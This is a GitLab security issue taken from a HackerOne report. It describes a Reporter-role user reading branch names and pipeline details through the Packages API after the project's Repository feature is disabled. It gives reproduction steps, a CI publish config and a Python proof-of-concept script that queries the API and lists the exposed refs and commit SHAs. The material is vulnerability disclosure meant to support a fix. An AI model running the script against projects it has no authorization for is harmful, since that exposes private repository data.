Reporter can read branch names and pipeline details even when the Repository option is disabled in the project via GET /api/v4/projects/{id}/packages

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3183740 by iamgk808 on 2025-06-09, assigned to @katwu:


Report

Summary

Once the Repository option is disabled in a project, no one can view the project code, branches, merge requests, or CI/CD details. However, I found a way in which an attacker can still read branch names and pipeline details even when the Repository option is disabled.

Steps to reproduce

Two users: victim and attacker.

Victim steps:

  1. Create a new group called hackerone and apply a GitLab Ultimate trial to it

  2. In the group, create a private project called project-1

  3. In project-1, create a new branch called fix-bug-report

  4. In the fix-bug-report branch, create a file called package.json with the following content (replace 70651278 with your project ID):

{
  "name": "my-package",
  "version": "1.0.0",
  "publishConfig": {
    "registry": "https://gitlab.com/api/v4/projects/70651278/packages/npm/"
  }
}
  5. Create another file called .gitlab-ci.yml with the following content:

image: node:20

stages:
  - publish

variables:
  NODE_AUTH_TOKEN: "${CI_JOB_TOKEN}"

before_script:
  - npm install

publish:
  stage: publish
  script:
    - echo "//gitlab.com/api/v4/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=${NODE_AUTH_TOKEN}" > .npmrc
    - npm publish


  6. A pipeline will run and create a package under Deploy > Package registry, where you can see the branch name and commit details

  7. Then go to Settings > Project permissions, turn off the Repository option and save it

  8. In Deploy > Package registry, the branch name and commit details are now hidden

  9. Now go to project-1 > Members and invite the attacker user with the Reporter role

Attacker steps:

  1. Go to project-1 and note the project ID


  2. In this URL, replace 70651278 with your project ID:

https://gitlab.com/api/v4/projects/70651278/packages

  3. The attacker can see the branch names and pipeline details

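To verify the attacker step without clicking through the UI, the script below parses a Packages API response and lists every repository-derived value (branch or tag ref, commit SHA, pipeline URL) that a Reporter can see; with the Repository feature turned off, a non-empty result is the condition this report describes, and an empty one shows a fix has landed. This is an added example for this issue, not GitLab code or the reporter's script. The field names follow the documented pipeline/pipelines objects of the Packages API; the embedded response, the package and pipeline IDs and SHAs, the GITLAB_TOKEN environment variable and the use of 70651278 as the default project ID are constructed or assumed for offline use.

```python
"""Report repository-derived data exposed via GET /api/v4/projects/{id}/packages.

Added example for this issue, not GitLab's or the reporter's code. Field names
(pipelines[].ref, pipelines[].sha, pipeline.ref, pipeline.sha, web_url) follow the
documented shape of the GitLab Packages API; the sample response is constructed.
"""
import json
import os
import urllib.request
from typing import Dict, List

# Constructed sample of what a Reporter might receive for the project in the
# report after the Repository feature was disabled. IDs and SHAs are made up.
SAMPLE_RESPONSE = json.dumps([
    {
        "id": 101,
        "name": "my-package",
        "version": "1.0.0",
        "package_type": "npm",
        "created_at": "2025-06-09T10:00:00.000Z",
        "pipeline": {                      # single-object form, older clients
            "id": 5001, "iid": 7,
            "sha": "9f3c2b1a7e6d5c4b3a2f1e0d9c8b7a6f5e4d3c2b",
            "ref": "fix-bug-report",
            "status": "success",
            "source": "push",
            "web_url": "https://gitlab.com/hackerone/project-1/-/pipelines/5001",
        },
        "pipelines": [                     # array form, same pipeline
            {
                "id": 5001, "iid": 7,
                "sha": "9f3c2b1a7e6d5c4b3a2f1e0d9c8b7a6f5e4d3c2b",
                "ref": "fix-bug-report",
                "status": "success",
                "source": "push",
                "web_url": "https://gitlab.com/hackerone/project-1/-/pipelines/5001",
            }
        ],
    },
    {   # a package uploaded by hand has no pipeline and exposes nothing
        "id": 102,
        "name": "manual-upload",
        "version": "0.1.0",
        "package_type": "generic",
        "created_at": "2025-06-09T11:00:00.000Z",
    },
])

# Values that come from the repository or its CI, not from the package itself.
REPO_FIELDS = ("ref", "sha", "web_url")


def repo_info_in_packages(raw_json: str) -> List[Dict[str, str]]:
    """Return one record per distinct (package, pipeline) that exposes any
    repository-derived field. Should be empty when Repository is disabled."""
    findings: List[Dict[str, str]] = []
    for pkg in json.loads(raw_json):
        pipelines = list(pkg.get("pipelines") or [])
        if pkg.get("pipeline"):
            pipelines.append(pkg["pipeline"])
        seen = set()
        for p in pipelines:
            exposed = {k: p[k] for k in REPO_FIELDS if p.get(k)}
            key = (p.get("id"), tuple(sorted(exposed)))
            if exposed and key not in seen:       # pipeline + pipelines overlap
                seen.add(key)
                findings.append({"package": f'{pkg["name"]}@{pkg["version"]}', **exposed})
    return findings


def repository_leaks(raw_json: str, repository_enabled: bool) -> bool:
    """True when pipeline/ref data is visible although Repository is turned off."""
    return (not repository_enabled) and bool(repo_info_in_packages(raw_json))


def fetch_packages(base_url: str, project_id: int, token: str) -> str:
    """Live variant of the attacker step: list packages using a Reporter's
    personal access token. Only used when GITLAB_TOKEN is set (assumption)."""
    req = urllib.request.Request(
        f"{base_url}/api/v4/projects/{project_id}/packages?per_page=100",
        headers={"PRIVATE-TOKEN": token},
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    token = os.environ.get("GITLAB_TOKEN")
    data = fetch_packages("https://gitlab.com", 70651278, token) if token else SAMPLE_RESPONSE
    for f in repo_info_in_packages(data):
        print(f"{f['package']}: ref={f.get('ref')} sha={f.get('sha')}")
    print("LEAK" if repository_leaks(data, repository_enabled=False) else "clean")
```

Run offline and it evaluates the constructed response, reporting the fix-bug-report ref and its commit SHA for my-package@1.0.0; set GITLAB_TOKEN to a Reporter-level token to run the same check against a real project whose Repository feature has been disabled.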

Impact

An attacker can read branch names and pipeline details even when the Repository option is disabled in the project.

Examples
What is the current bug behavior?

An attacker can read branch names and pipeline details even when the Repository option is disabled in the project.

What is the expected correct behavior?

No one should be able to read the repository contents.


Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • image.png
  • image.png
  • image.png
  • image.png
  • image.png
  • image.png
  • image.png
  • image.png
  • image.png
  • image.png

How To Reproduce

Please add reproducibility information to this section:
